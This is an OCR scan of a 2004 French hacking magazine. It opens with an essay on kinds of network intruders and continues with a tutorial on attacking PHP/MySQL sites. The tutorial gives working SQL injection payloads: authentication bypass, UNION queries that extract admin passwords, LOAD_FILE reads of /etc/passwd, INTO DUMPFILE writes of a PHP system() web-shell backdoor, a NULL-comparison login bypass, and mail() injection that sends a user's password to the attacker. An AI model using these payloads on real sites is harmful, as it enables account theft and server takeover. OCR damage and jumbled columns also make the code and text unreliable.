serveurs ou des sites spécialisés, et les 
 Gamez ", même mouture, mais uni- 


MAI-JUIN 2004 


quement pour les jeux informatiques. 
Enfin, le must demeure bien entendu 
le" Wardriving ", méthode qui consis- 
te à se balader en ville avec un porta 
ble et une antenne un brin bricolée, 
dans le but de détecter Les réseaux 
Wireless en exploitation. 


11 faut toutefois faire la différence 
entre ceux qui recherchent er écou- 
tent ces réseaux et ceux qui les pénè- 
trent. 


Les risques dépendants 
des ue ke 


Quel que soit le type de hackers, 
bien des pays les assimilent à des cri- 
minels et un arsenal de lois permet de 
les condamner. Certains pays euro- 
péens assimilent le hacking au vol pur 
et simple d'informations et jugent les 
hackers de la sorte. C'est certes une 
manière de voir les choses, mais une 
manière toutefois qui occulte une 
situation importante, celle de la sécu- 
rité. 


En effet, ce sont les hackers qui 
font avancer la sécurité informatique 
et non pas les entreprises développant 
des softs. Les entreprises développant 
les softs ont un autre but, celui de la 
production, de la rentabilité et de la 
diffusion rapide de nouveautés. 


La sécurité n'est pas un objectif 
prioritaire, à l'exception des applica- 
tions conçues uniquement dans cette 
optique. L'objectif prioritaire de ces 
entreprises étant bien entendu la 
réalisation financière, elles laissent 
trop souvent le soin aux utilisateurs 
de découvrir les failles et proposent, 
par la force des choses, des updates. 
C'est une manière courante de procé- 
der et Microsoft, par exemple, ne se 
prive pas d'exploiter cette manière de 
faire. 
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Les hackers participent activement 
à l'évolution des procédures et des 
systèmes de sûreté et sécurité infor- 
matique, et bien des entreprises n'ont 
pas encore pris conscience de cette 
réalité. De nombreux hackers, après 
avoir trouvé une faille dans des 
réseaux d'entreprises, ont contacté ces 
dernières pour leur faire part de la 
découverte. 


La plupart du temps, ces entre- 
prises renoncent à les écouter et sou- 
vent même, les dénoncent. C'est 
bien dommage, car cette manière de 
faire démontre l'incapacité de cer- 
taines entreprises d'analyser de 
manière factuelle la situation et sur- 
tout, leur inaptitude à anticiper des 
situations de crise. Que ces entre- 
prises continuent à dormir sur leurs 
lauriers, le réveil sera d'autant plus 
difficile. 


Si les hackers disposent en princi- 
pe de peu de moyens financiers, ils 
bénéficient par contre d'un atout 
majeur qu'est celui du temps. Un hac- 
ker qui décide d'atteindre une cible 
atteindra toujours sa cible, 


Certains ont des compétences 
considérables, parfois supérieures à 
celles des concepteurs d'origine du 
système. Ils examinent le système 
de l'extérieur avec un œil d'as- 
saillant et non pas de l'intérieur 
avec le regard d'un concepteur. Les 
entreprises qui ont la chance de se 
faire contacter par des hackers 
devraient avoir la capacité d'ac- 
cepter ce dialogue comme une 
valeur ajoutée et Surtout comme un 
audit bon marché. 


Certains hackers ont aussi créé des 
enseignes de sécurité honnêtes, pro- 
fessionnelles et garantissant une cer- 
taine éthique. Cela permet, de temps 
en temps, de rehausser l'image des 
hackers et de les présenter sous un 
jour plus acceptable. Toutefois pour la 
majorité des gens, il est fort difficile 
de distinguer des hackers de bonne 
moralité des autres qui, eux, ne sont 
que des crapules et de dangereux cri- 
minels. 
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Les criminels isolés 


À l'opposé des hackers qui parta- 
gent leurs connaissances, il existe les 
criminels isolés. 


Les criminels isolés sont à l'origi- 
ne de la plupart des cyber crimes. Ils 
ont pour cible les systèmes commer- 
ciaux car c'est là que se trouve l'ar- 
gent. Leurs techniques manquent 
souvent d'élégance mais ils réussis- 
sent à soutirer de l'argent. Ils coûtent 
toutefois plus cher à arrêter et à pour- 
suivre en justice et ils en profitent. 


Ils deviennent de plus en plus nom- 
breux et méritent que les lois s'occu- 
pent plus sérieusement de leur cas. 
Maïs il est plus facile, sous couvert de 
la prévention, de ratisser large et d'in- 
quiéter les hackers de manière globa- 
le que de s'attaquer à un criminel 
isolé. Les raisons de cette manière de 
procéder, le manque de moyens des 
autorités, le manque de compétence 
de bien de leurs spécialistes et sur- 
tout, le manque de temps. 


Comme quoi, les criminels isolés 
ont encore de beaux jours devant eux. 
Les autorités de nombreux pays en 
sont conscientes et tentent de faire 
avec... 


Les entreprises, par contre, ne sont 
pas toutes encore conscientes, mais 
tentent aussi de faire avec. 


Les criminels isolés sont tout aussi 
dangereux, au niveau des intrusions, 
que les hackers mais à la différence 
de ces derniers, ils ne prennent pas la 
peine de dialoguer avec leurs cibles, 
Done, une cible avec un criminel isolé 
sur le dos n'a plus qu'une solution, 
celle d'attendre et de voir venir ! 


Les employés malveillants 


Les employés malveillants sont 
dangereux et sournois et sont compa- 
rables aux chevaux de Troie. Ts béné- 
ficient de toutes les informations 
techniques leur permettant d'atteind- 
re leurs buts. Ils disposent de la 
connaissance interne des moyens de 
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défenses, connaissent également les 
failles et surtout, sont considérés 
comme des utilisateurs fiables. Tant 
qu'ils ne sont pas débusqués, les 
entreprises, par la force des choses, 
leurs accordent leur confiance. 


Sous cette appellation générale, 
on doit aussi tenir compte qu'il ne 
s'agit pas exclusivement de collabo- 
rateurs à plein temps. On peut aussi 
trouver des sous:traitants et même 
des consultants. 


Les motivations sont dès lors mul- 
tiples et un effort considérable doit 
être entrepris dans les entreprises 
pour tenter d'anticiper la prolifération 
de ces intrus qui arrivent très souvent 
à leurs fins. 


Les entreprises qui sont La cible 
d'employés malveillants sont plutôt 
mal à l'aise et impuissantes car lors- 
qu'elles découvrent le sinistre, il est 
souvent trop tard pour réagir. De sur- 
croît et au nom de la sacro-sainte phi- 
losophie de la discrétion, bien des 
entreprises préfèrent étouffer le scan- 
dale et se refusent à traduire ces 
employés malveillants en justi 


C'est le droit le plus strict des 
entreprises concernées, mais qu'elles 
ne viennent pas se plaindre en cas de 
récidive, car ces intrus sont compara- 
bles à des criminels isolés, 


L'espionnage industriel 


On mésestime l'espionnage indus- 
triel par le biais de l'informatique, 
De nombreuses personnes s'imagi- 
nent-encore que l'espionnage indus- 
triel est le fruit de techniques 
archaïques datant de l'époque de la 
guerre froide, 


L'espionnage industriel est une 
guerre continue, une guerre avec des 
règles du jeu et des arbitres qui ten- 
tent de faire en sorte que des lois 
soient appliquées dans un cadre légal. 


Mais où s'arrête la veille concur- 
rentielle et technologique et où com- 
mence l'espionnage industriel ? 


em sumE 


sonus 


[3 


wra- 


Qui sont les intrus du net 


Les intrus, dans ce domaine, sont très 
particuliers. Ils disposent de moyens finan- 
ciers importants et également de temps. 
C'est en quelque sorte le hacking du riche. 
Is arrivent en principe à leurs fins, maisles 
résultats sont difficilement contrôlables car, 
dans ce domaine, les cibles ont une fâcheu- 
se tendance à rester très discrètes | 


Toutefois, les entreprises subissant 
les assauts de tels intrus peuvent 
admettre que les risques sont sensi- 
blement moins élevés que lors d'at- 
taques provenant de hackers ou de 
criminels isolés. 


En effet, ce type d'intrus ne peut se 
permettre de se faire prendre, L'en- 
treprise lui ayant confié discrètement 
la cueillette d'informations le lâchera 
immédiatement en niant toute partici- 
pation. L'intrus se trouvera le dindon 
de la farce et devra assumer person- 
nellement la totalité de ses actes. 

Dans le domaine de l'espionnage éco- 
nomique et industriel, les intrus isolés 
sont rares car dès que des intérêts finan- 
ciers très importants entrent en jeu, les 
organisations nationales de renseigne- 
ments interviennent discrètement, 


La presse 


Tout comme l'espionnage indus- 
triel, la presse recherche des informa- 
tions bien précises. Toutefois, ces 
informations étant destinées à être 
publiées, le rôle des intrus se limite 
souvent à les trouver, permettant ainsi 
d'étayer des articles ou des prises de 
position, et non pas à détruire ou alté- 
rer des réseaux. 


Les risques sont excessivement 
limités et les entreprises attaquées 
peuvent se permettre de ne pas trop 
s'inquiéter. Elles doivent toutefois res- 
ter très prudentes car si la presse n'est 
pas classifiée comme un risque 
majeur, leurs sous-traitants, eux, sont 
dans la catégorie à hauts risques. 


La police 


Four des raisons de compréhen- 
sion, nous appellerons de manière 
générale " Police tous les secteurs 


de l'administration gravitant autour 
de la police, 


La police est très présente sur 
Internet mais de manière discrète, car 
elle devrait agir à titre préventif, en 
plus des missions spécifiques qui lui 
sont confiées. 


On il s'avère, er l'on retrouve cette 
situation dans de nombreux pays euro- 
péens, que l'effectif des collaborateurs 
spécialisés dans le domaine informa- 
tique est insuffisant. De surcroît, ces 
spécialistes sont divisés en deux caté- 
gories distinctes, Les bons et... les 
moins bons ! Les bons sont excessive- 
ment performants et capables de prou- 
esses techniques allant au-delà de 
l'imaginable. Toutefois, ils représen- 
tent moins de la moitié des effectifs 
et doivent collaborer avec des collè- 
gues qui sont moins au courant de cer- 
taines possibilités informatiques. Le 
tout dans une structure très hiérar- 
chisée et totalement dépendante de 
l'autorité et du pouvoir politique. 


En ayant vu certains cyber poli- 
ciers à l'œuvre, mon point de vue est 
conforté, 


Ces cyber policiers sont également 
des intrus, mais les risques pour les 
entreprises ou particuliers sont mini- 
mes si la police intervient à titre pré- 
ventif. Par contre, il faut rester très 
attentif en cas d'intervention réactive 
car dans ce cas de figure, il y a de for. 
tes chances que la mission ait été 
confiée à des fonctionnaires très per- 
formants ! 


En outres, ces intrus respectent les 
règles du jeu en matière d'intrusion, 
car ils représentent une institution qui 
n'a pas droit à l'erreur dans le cadre 
de ses enquêtes. 


Dans ce domaine, on pourrait 
encore parler d'autres intrus tels les 
terroristes, les agences nationales de 
renseignements et le crime organisé. 
Ces intrus représentent une part non 
négligeable des utilisateurs d'Internet 
etilne faut surtout pas les ignorer car 
leurs possibilités d'intrusion et leurs 
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capacités de discrétion sont vraiment 
exceptionnelles. Les entreprises qui 
se retrouvent avec de tels intrus sur le 
dos n'ont qu'une chose à faire... appe- 
ler la police | 


Ces intrus qui font évoluer 
la sécurité informatique 


La sécurité informatique évolue 
grâce aux intrus. Les erreurs de cer. 
tains et Les exploits des autres appor- 
tent aux entreprises, gouvernements 
et particuliers, des éléments de para 
des permettant de tenter de consér- 
ver leurs réseaux à l'abri d'oreilles 
indiscrètes. 


Sur un autre plan, des mesures 
sont prises pour pénaliser les intrus et 
ce, dans un but soi-disant préventif, 
Mais ces mesures sont souvent inadap- 
tées car pensées, élaborées et appli- 
quées par le pouvoir politique qui 
ignore, contrairement aux hackers, le 
partage de la connaissance. 


Certains pays européens sont en 
train, dans ce domaine, de pondre des 
lois qui, à court terme, permettront de 
glorifier leurs auteurs. Mais à moyen 
terme, ces pays regretteront amère- 
ment d'avoir écouté ces " Script kid- 
dies " et se trouveront dans une 
situation périlleuse. Ces pays seront 
alors totalement dépassés dans le 
domaine de la sécurité informatique 
et feront l'objet d'intrusions massives 
dans tous leurs secteurs économiques, 
sans avoir la moindre capacité de réac- 
tion. 


On ne parlera alors même plus 
d'anticipation ! 


Et pendant ce temps, les hackers 
continueront à hacker... 


CHanLes-AnDré Ro 
(CONSEIL ET DÉVELOPPEMENT 
EN CONFIDENTIALITÉ DE L'INFORMATION 
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Nouvelles attaques 


Depuis que MySQL 
intègre le mot clé 
union dans ses 
requêtes, les 
injections de SQL 
permises par certains 
scripts php sont 
devenues plus 
complexes et plus 
dangereuses. On va 
voir dans cet article 
que la combinaison 
de ces deux langages 
rend aussi possible 
d'autres attaques 
évoluées, dont 
plusieurs sont 
inédites. 


Table de matières : 


1 - Introduction 
2-LIMT 

3- SQL FILE COPY 
4-UNION 

5- NULL Auth 

6- maill) + SQL 


NIVEAU 
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1 - Introduction : 


Ce texte pourrait être la suite 
de " L'injection (My)SQL via 
PHP " paru dans le Manuel 5. 
Néanmoins, je ne lui ai pas 
donné le même nom car ce dont 
je vais parler ici, bien que tou- 
jours en rapport avec le SQL, 
n'est pas seulement de l'injec- 
tion SQL ; il y a aussi quelques 
réactions dues au couple 
PHP/MySQL (si courant). Si cer- 
taines choses vous échappent au 
sujet de l'injection SQL dans les 
explications qui suivent, il est 
fortement possible que vous 
trouviez des réponses dans ce 
premier texte, 

Je vais traiter ici de cas 
moins généraux, plus précis que 
dans ce précédent texte, comme 
par exemple des injections SOL 
avec UNION, que je n'avais pas 
abordées auparavant. En vérité, 
ce deuxième texte sur le SQL et 
PHP est né parce que je n'avais 
justement pas parlé d'UNION : 
il fallait combler ce manque, En 
me documentant pour être sûr 
de ne pas raconter de conne- 

ies :), j'ai eu quelques idées. Ce 
qui fait que les deux premières 
parties de cet article ne sont là 
qu'en satellite, Mais j'ai trouvé 


les points suffisamment impor. | 


tants pour leur dédier une par: 
tie entière 
Pour certains titres de la 


table de matières, ne soyez pas | 


étonnés de n'avoir jamais enten- 
du ça : comme j'ai découvert ces 
problèmes, je leur ai moi-même 
donné un nom 


Je rappelle que pour tous ces 
exemples, je considère que 
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BY FROG- MON. 


magic_quotes_gpe est à OFF 
dans le phpani. 


2:- LIMIT : 


LIMIT est utilisée pour limi- 
ter le nombre d'enregistrements 
retournés par une requête 
SELECT. Ses arguments sont des 
entiers constants. Si un seul 
argument est donné, il fixera le 
nombre d'enregistrements maxi- 
mum à retourner. Si deux argu- 
ments sont donnés, le premier 
indique en plus l'index à partir 
duquel un commence. 

On sait que si une requête 
SQL est de cette forme : 

SELECT * FROM menbres 
WHERE. pseudo=" pseudo! 
AND pass="$passuord' 

il suffira de donner à fpseudo 
la valeur ' OR 1=1/* pour que la 
requête exécutée SoiL 
SELECT * FROM nenbres WHERE 
pseudo="" OR 1=1/* AND pass="" 

Cette requête aura donc 
comme résultat tous Les champs 
de tous les enregistrements de la 
table membres. 

Or il arrive que d'autres 
comptes aient été créés avant 
l'admin. Imaginons une table de 
5 enregistrements dont le pre- 
mier contiendra un membre sim- 
ple, le deuxième un modérateur, 
et le troisième, enfin, l'admin. Le 
résultat de la requête précéden- 
te sera alors : 


Ciümem | mseudo | pass | email level 
[1 [test  |aïside |'test@testcom no 
2 | mode |[198b459 | modeëvebstecom | 1 
[3 l'ami |-m'tava [vetmaster@uincom | 2 
4 [om |oagr& | Jonn@uricom 0 
5 [eo [5564555 |Bob@mareycm | 0 


uvelles attaques sur PHP/MySQL 


s sur PHP/MySQL 


On aura donc 5 enregistrements à 
traiter, Pourtant, dans beaucoup de 
cas, seul le premier sera 
c'est un compte non pr 3 

Il lui faut donc trouver un moyen 
de tester chaque compte. Évidemment, 
on considérera qu'on ne connaît pas la 
structure de la table, sinon on pourrait 
directement injecter ! OR level=2/*, ou 
incrémenter le champ idmem. 

Non, il faut faire sans les noms des 
champs. Et c'est ici qu'intervient 
LIMIT. On peut, grâce à ce mot-clé, 
vérifier chaque enregistrement donné 
en résultat un à un, avec LIMIT 0,1 
puis LIMIT 1,1, pour arriver finale- 
ment à ‘ OR 1=1 LIMIT 2,1/* ce qui 
donne comme requête : 
SELECT * FROM membres WHERE pseudo=" ‘ 


tionnera parfaitement, créant un 
fichier PHP à la racine du site : 
SELECT ‘<? system(icnd); ?>' 

FROM existant table INTO 

DUMPFILE ‘/pathto/mebsite/backdoor. php' 


On a aussi vu comment utiliser la 
fonction LOAD. FILE() dans les requê- 
tes UPDATE. Mais, tout comme INTO 
OUTFILE d'ailleurs, cette fonction 
peut sans problème s'utiliser dans 
d'autres sortes de requêtes. Par exem- 
ple avec SELECT, la requête suivante 
va renvoyer comme résultat le conte- 
nu du fichier /complete/path/file2.txt : 
SELECT 

LOAD_FILE('/compiete/path/fi1e2.txt!) 

De là, il n'y a plus qu'un pas à faire 
pour réaliser une copie de fichiers avec 


et de donner par exemple à femail 

la valeur : 

emi.1',LOAD_FILE('/etc/passud'))#, 

Alors la requête SQL deviendra : 

INSERT INTO membres 

{login pass email description) 

VALUES ('mylogin", 'mypass','emêi.1', 
LOAD_FILE( ‘/etc/passwd')}#","") 

et la description du nouvel utilisateur 

sera le fichier Jetc/passwd ! 


4- UNION : 


Voici donc le chapitre principal de 
ce texte, UNION permet de combiner 
le résultat de plusieurs requêtes de 
type SELECT en un seul, Pour les 
explications et exemples, imaginons 
deux tables. La première, la table 


GR 1=1 LIMIT 2,1/4 AUD pase=!" une requête SQL. Imaginons que l'on | " membres " contient l'enregistre. 

et comme résultat : veuille copier grâce à une requête SQL | ment: 

[iimem | pseudo | pass em level mid | miogin | mpass | memai mnewsletter 
3 admin Î -m*tz4a | webmester@wuin.com | 2 5 | Franck | Osephine | franck.boune@extasia.com 0 

3 - SQL FILE COPY : Un deuxième table, " admin ", 


Dans le Manuel 5, on a vu comment 
utiliser INTO OUTFILE et INTO 
DUMPFILE dans une requête 
SELECT. Par exemple, la requête : 
SELECT + FROM table 
INTO CUTFILE ‘/conplete/péth/fi1e1.txt" 

enregistrera tous les éléments de la 
table " table " dans le fichier /com- 
plete/path/filel.txt du serveur (ici le 
WHERE 1=1 n'est pas nécessaire) 

Une particularité d'INTO OUTFI- 
LE est qu'il faut spécifier, pourqu'il 
fonctionne, un FROM, avec une table 
existante, même si on ne s'en sert pas. 
Mais cela ne nous empêche pas de 
faire des choses intéressantes. Il faut 
juste connaître le nom d'une table. Par 
exemple, pour créer une backdoor 
PHP avec une requête SQL, il ne sera 
pas possible de faire ça : 

SELECT ‘<? system($cmd); ?>' INTO 
DUMPFILE */path/to/vebsite/backdoor. php! 

par contre la requête suivante fonc- 


le fichier http#/[url]/config.php dans 

le fichier http:/[urlconfig.txt, la raci- 

ne du site étant /complete/path/. 
Il suffira alors d'exécuter la 
requête : 

SELECT 
LOAD_FILE('/complete/path/config.php' ) 
FROM ext stant table 

INTO QUTFILE ‘/complete/path/config. txt" 

Pour cette opération, bien sûr, le 
serveur doit avoir le droit en lectu- 
re/écriture, plus toutes les conditions 
propres à INTO OUTFILE et à la fonc- 
tion LOAD_FILE(). 


Post Mortem (heu... Scriptum) : au 
sujet de LOAD FILE(), il pourrait 
aussi être intéressant d'utiliser cette 
fonction dans des requêtes INSERT. 
Par exemple avec la requête : 

INSERT INTO membres 
(login,pass,email, description) VALUES 


C'Slogin', '$pass', 'femail! ,'Sdesor') 
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contient l'enregistrement : 


alogin 


|apass 


1_| webmaster | eBta120w 


Donc : deux tables distinctes avec 
des champs de types et de noms ainsi 
que des structures différents. 


4,1 FAIRE CORRESPONDRE LES COLONNES 


Maintenant, voyons comment utili- 
ser UNION. Tout d'abord il faut savoir 
que pour qu'UNION fonctionne, le 
nombre de champs résultants des 
requêtes liées doit être le même. 
Ainsi cette requête générera une 
erreur : 
SELECT mogin FROM membres 
WHERE mic=s UNION SELECT aid, login 
FROH admin WHERE aid=1 
cfiet, la première requête 
extrait un champ (mlogin) et 


E 
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D 


La deuxième en extrait deux (aid et alo- 
gin). Par contre, cette requête : 
SELECT mlogin,mpess FROH membres 
UHERE mid=5 UNION 
SELECT alogin,apass 
FRON admin WHERE aid=1 


donnera le résultat : 


miogin | mpass 
Franck j0seph1ne 
webmaster | e81a-1249n 


On remarque que les champs de la 
deuxième ligne du résultat sont consi- 
dérés comme ayant les noms de la pre- 
mière requête, c'est-à-dire mlogin et 
mpass, alors que dans la table ce sont 
alogin et apass. On verra plus tard que 
ça peut avoir une conséquence. Mais 
en vérité, ces deux derniers champs ne 
prennent pas que les noms des champs 
choisis dans la première requête, ils 
prennent aussi leur type. Ce qui fixe 
donc une deuxième contrainte à pren. 
dre en compte. Ici on n'a pas eu de pro- 
blème car tous les champs étaient de 
type "string ". Mais imaginons que la 
requête ait été : 

SELECT mlogin,mid FROM nenbres 
WHERE mid=5 UNION 
SELECT alogin,apass 
FROM admin MÈRE aide 


Bien que le nombre de champs et | 


Ja syntaxe soient bons, le résultat ne 
sera pas celui escompté mais bien : 


miogn | mil 
Franck 5 
webmaster | 0 


En effet, dans le résultat de la 
deuxième requête, on aura bien le 
login de l'admin 1, mais pas son mot 
de passe. mid étant un champ de type 
 integer ", le deuxième champ (de 
type "String " : apass) sera converti à 
ce type, donnant le résultat 0. 

J'ai néanmoins élaboré une petite 
technique pour récupérer des infos de 
type " string " même si dans la pre- 
mière requête les champs sont de type 
“ integer ". Cette technique consiste à 
convertir le champ " string " en base 
10 (en integer donc), grâce à la fonc- 
tion CONV(). 
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Pour cela, il faut d'abord choisi 
une base de début, j'opte pour 36, qui 
permettra de convertir tous les chiff- 
res (0->9) et toutes les lettres (a->z). 
Elle aura comme défaut de ne pas 
accepter les caractères +, _… qui peu- 
vent se trouver dans un mot de passe. 
Si un de ces caractères est placé dans 
un champ, la fonction s'arrête de 
convertir et renvoie le résultat incom- 
plet. MySQL a du mal avec les bases 
plus élevées, et renvoie NULL. 

Donc, comme le mot de passe 
admin contient dans cet exemple jus- 
tement un caractère " -", on va extrai- 
re le mot de passe de Franck dans une 
deuxième requête, liée par UNION 
pour que ça ne pose pas de problème. 
Ce qui donne : 

SELECT mid FROM membres WHERE mid=4 

UNION SELECT CONV(mpass ,36, 1) 
FRON membres NHERE mid=5 


ir | Cette requête ne serait pas correcte 


car le nombre de champs est différent : 
SELECT * FROM nenbres 
WHERE mlogin= Franck! 
UNION SELECT * FROM admin 


NHERE aTogin="nebmaster" l 


I doit y avoir cinq champs en 
résultat dans la deuxième requête 
(comme dans la première requête) | 
alors que la table admin n'en contient 
que quatre. On peut alors en rajouter 
un directement dans la requête de 
cette façon : 

SELECT * FROM menbres WHERE mlogin=" Franck! 
UNION SELECT &ld,alogin apass, 
"biom@bl um.be* ,a1evel 
FROM admin WHERE alogin=" webmaster" 


Le résultat serait alors : 


Le résultat sera: | mg | mogn | myass memall mewslétter 
5 | Frank | josphine | frenckoune@emtasiacom û 
mlogn 1 | webmaster | esta 129w | biomeblumbe 
: se ] 
Ls3662627456226 | Évidemment, si on avait fait le 


53662927459226 est le mot de passe 
converti de la base 36 à La base 10 du 
membre Franck (ayant l'id 5). Il suffi- 
ra alors de faire la conversion inverse 
pour récupérer le mot de passe en 
clair, par exemple avec une simple 
requête SQL : 

SELECT. CONV(53662927459226, 19,36) 

AS resultat 

Ce qui donnera bien j0sephine!, 


Imaginons meintenant que l'on 
veuille ne requête SQL UNION qui 
affiche tous les champs du membre " 
Franck "et de l'admin " webmaster ". 


résultat de cette requête sera : 


contraire en commençant par la table 
"admin "de cette façon : 
SELECT * FROM adnin 

WHERE alogin= webmaster" 
UNION SELECT * FROM membres 

WHERE mlogin=" Franck" 

la requête aurait été tout aussi 
fausse. Une solution consiste à utiliser 
la fonction CONCAT(), pour donner 
deux résultats en un. Voyons la 
requête : 
SELECT * FROM admin 
WHERE alogin="webmester‘ 

UNION SELECT mid, 
CONCAT(mIogin, char (58) ,char(58) ,memat 1), 
pass,mews letter 

FROM membres WHERE mlogin=" Franck! 


char(58) renvoyant le caractère " : ", le 


ai | atogn 


apass alevel 


1_| webmaster 


eë1a12%u | 2 


5 | Franck:franckboune@ettésia.com 


J0sephne 0 
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4.2 GÉRER LES LIGNES 


Mais que se passe-t-il si le script 
n'affiche qu'un des enregistrements 
donnés en résultat ? Lequel affichera- 
til ? 

Un enregistrement au hasard ? 
Non ! 1] choisira en général le premier 
enregistrement, selon la méthode uti- 
lisée dans PHP. Un exemple typique : 
Sresultarray = mysql_fetch_rou(Sresult) ; 
echo tresultarray[2]; 

Ici c'est le premier enregistrement 
que le script affiche. Il faut donc faire 
en sorte que le premier enregistrement 
soit celui qui nous intéresse : celui de 
la seconde requête SELECT. 

Pour cela, on peut utiliser deux 
moyens. Le premier consiste à utiliser 
LIMIT, comme on l’a vu dans le chapi- 
tre 1, c'est-à-dire à donner à $fmemid 
la valeur 5 UNION SELECT apass FROM admin 
WHERE aid=1 LIMIT 1,1. 

Le deuxième moyen est de faire en 
sorte que la première requête ne ren- 
voie pas de résultat, en lui donnant 
une condition qui ne trouvera aucun 
enregistrement. Par exemple avec la 
valeur -1 UNION SELECT apass FROM admin 
WHERE aid=1 (ou encore 5 OR 1=2 UNION 
SELECT apass FROM admin MHERE aîd=1, 
ete.). La requête devient alors 
SELECT mlogin FROM menbres 

WHERE mid=-1 UNION SELECT apess 
FROM admin MHERE aid=1 


4.3 SANS AFFICHAGE 


Voilà pour ce qui est d'extraire des 
informations de la base de données 
avec UNION, si les informations sont 
affichées ensuite par le script utilisé 
Mais UNION peut-il être utilisé effi- 
cacement, même si les informations ne 
sont pas affichées ? Pour cela j'ai juste 
légèrement changé le script qui affi- 
chera le login du membre en fonction 
de son ID membre par un script qui 
indiquera simplement si le membre 
existe (toujours en fonction de son ID 
membre), sans afficher aucune infor 
mation : 


«4 


| 


ÀP (mysql num rows ($resu1t)=1){ 
print (‘le membre $memid existe."); 
Jelse{ 
print('Le membre $memid n\existe pas”); 
} 
nysal_close(#1ink); 
m 


11 suffit de revenir au chapitre pré- 
cédent pour trouver des utilisations 
d'UNION dans ce script. 

En effet, si on donne à $memid la 
valeur -1 UNION SELECT apass FROM admin 
WHERE aïd=1, on aura (voir quelques 
lignes plus haut) comme résultat le 
mot de passe de l'admin, mais ici il ne 
sera pas affiché (le script affichera 
juste " Le membre -1 UNION SELECT 
apass FROM admin WHERE aid=1 
existe 

Si maintenant on donne à $memid 
la valeur -1 UNION SELECT apass FROM 
admin WHERE aïd=l INTO  OUTFILE 
‘/path/apass.txt', la requête devien- 
dra: 

SELECT mlogin FROM menbres 
WHERE mid=-1 UNION SELECT apess 
FROM admin MHERE aîd=1 
INTO OUTFILE ‘/path/apass.txt' 


<?php 


}else( 


Jelse 


} 
} 
mysql_close($l ink); 
Es 


STink = nysql_connect("dbhost", "dblogin", "dbpass"); 


mysql_select_db("dbname" ); 


$q = "SELECT mogin FROM nembres MHERE mid=$memi d''; 


$result = mysql_query($q): 
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Le résultat ne sera toujours pas 
affiché, mais il sera enregistré dans le 
fichier /path/apass.txt, où (si " path " 
est le chemin complet vers le site) il 
pourra être accessible à tous en 
lecture, 


On peut évidemment se servir d'U- 
NION pour créer un fichier PHP ou 
autre en donnant à $memid la valeur 
-1 UNION SELECT ‘<? phpinfo(); ?>' FRON 
membres INTO OUTFILE ‘/path/badfile. php". 


Et enfin, une dernière idée serait 
d'utiliser le LIKE pour récupérer des 
infos bien qu'elles ne soient pas affi- 
chées (voir l'article du Manuel 5, par- 
tie " SELECT "). 


5 - NULL Auth : 


Le fait de vérifier qu'un utilisateur 
a bien rentré toutes les données avant 
d'utiliser les variables concernées ne 
sert pas qu'à améliorer la qualité du 
script ou la compréhension de l'utili- 
sateur. Il permet aussi d'empêcher une 
éventuelle faille de sécurité selon le 
contexte. 


En effet, imaginons un script de login qui vérifie uni- 
quement la variable qui va être utilisée dans la requête 
SQL, la variable $login : 


$link = nysql_comect("dbhost", "dblogin", “dbpass”); 
mysql_seïect_db( "dbname*); 

if (lisset(Slogin))}{ 

echo "Veuillez entrer Votre login.": 


$q = "SELECT password FROM membres WHERE Togin='$login'" 
$result = nysql_query($q); 
Tist (fpass) = mysql_fetch_row($resut); 
49 ($pass = Spassword)( 
echo "Identification réussie 


echo "Login ou mot de passe incorrect ."; 


On peut done ici se permettre 
d'exécuter le script sans avoir donné à 
$password aucune valeur. Voyons main- 
tenant ce qui se passe si en plus on 
donne à $login une valeur qui n'existe 
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pas dans la base de données, un login 
inexistant, Disons " nonexistant " 
requête SQL exécutée sera alors 
SELECT password FROM membres 
MHERE Togin='nonexistant" 

La fonction list() ne donnera alors 
aucune valeur à la variable Spas... ou 
plus exactement elle lui donnera la 
valeur NULL. 

Vient ensuite la comparaison entre 
$pass et Spassword. Ces deux variables 
contiennent chacune la valeur NULL, 
la comparaison renvoie donc vrai. et 
on est considéré comme loggé sans 
connaître ni le mot de passe ni le login 
utilisateur. La vérification de chaque 
variable est donc dans ce cas cruciale. 


6 - mail() + SQL: 


Un phénomène m'a frappé dans 
une ou deux applications distribuées 
sur le Net. J'ai déjà vu des textes sur 
Internet parlant d'injection SQL dans 
un formulaire d'envoi d'email (en cas 
de perte). Ces méthodes expliquaient 
comment faire de l'injection SQL mal- 
gré une vérification du format de l'e- 
mail grâce à des expressions 
régulières, En gros, il faut d'une manië- 
re ou d'une autre intercaler une adres- 
se e-mail d'un format correct dans 
l'injection. 


Par exemple avec le code : 


$resut = mysql_query(*SELECT passud FROM membres WHERE emai1= $email'" 


on pouvait donner dans email 
l'adresse en commentaire : 

SELECT passwd FROM membres NHERE 
enail='" OR 1=1 /*correctäenai 1. com*/ 
INTO OUTFILE ‘/path/to/site/pnd. txt 

Ces méthodes n'utilisaient donc 
que la partie MySQL du script. 

Mais où le script va-t-il chercher 
l'email où il doit envoyer le mot de 
passe ? Il a deux choix, soit dans la 
base de données, soit dans la variable 
entrée par l'utilisateur. C'est cette 
deuxième possibilité qui peut poser 
problème, s’il n'y a pas suffisamment 
de vérifications. 
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Imaginons le script de récupération : 


<?php 


Slink = mysql_connect ('abhost", "dblogin", "dbpass"); 


mysql_select_db{"dbname"); 
$emai 1=t_POSTL "email" ]; 


$resut = mysql _query('SELECT passwd FRON membres WHERE emai1="$enail'"); 


if (mysql_nun_rows($result)>2){ 


Sresultarray=nysql_feteh_rou($result); 
*Sresultérray{#].".\nEye L\n" 


Smessage="Hel lo, \nYour passhord 


1f (mail ($email , "Your Password" ,$message, "From: vebmaster@bugged. com" )) { 


echo “Your password has been sent"; 
} 

} 

mysql_close($Tink); 

> 


Ce script est évidemment très pri- 
maire, mais c'est pour l'exemple. Il 
serait possible par son biais de se faire 
envoyer dans son email le mot de passe 
de n'importe quel utilisateur. En effet, 
voyons ce qui se passe si on donne à 
$_POST["email"] la valeur OR 
Togin='Bob' OR 1=' .hackerGemail.com. 

D'abord au niveau SQL, la requête 
exécutée deviendra : 

SELECT passud FROM MEMBRES WHERE 
emai="" OR Togin='Bob' OR 1=',hac- 
ker@email. con’ 

La condition enai1='* est toujours 
fausse, car on imagine que l'email est 
obligatoire ; hackerdemail.com' est 
également fausse. Par contre, la condi- 


tion login='Bob' sera prise en compte, 
et c'est le mot de passe de Bob qui sera 
renvoyé. 


Maintenant, voyons à qui il sera 
envoyé : vérifions ce qui se passe au 
niveau de la fonction mail(). Si le mot 
de passe est “ 9xa4f7p6 ”, la fonction 
exécutée sera : 

mail{"" OR login='Bob' OR 1=',hac- 
ker@enail.com", "Your Password’, 
Hello, \nfour password : Oxa4f7p6\nBye 
In", "From: webmaster@bugged. con"). Le 
mail aura ainsi cette forme : 

To: ! OR Togin="Bob" OR 1=', 
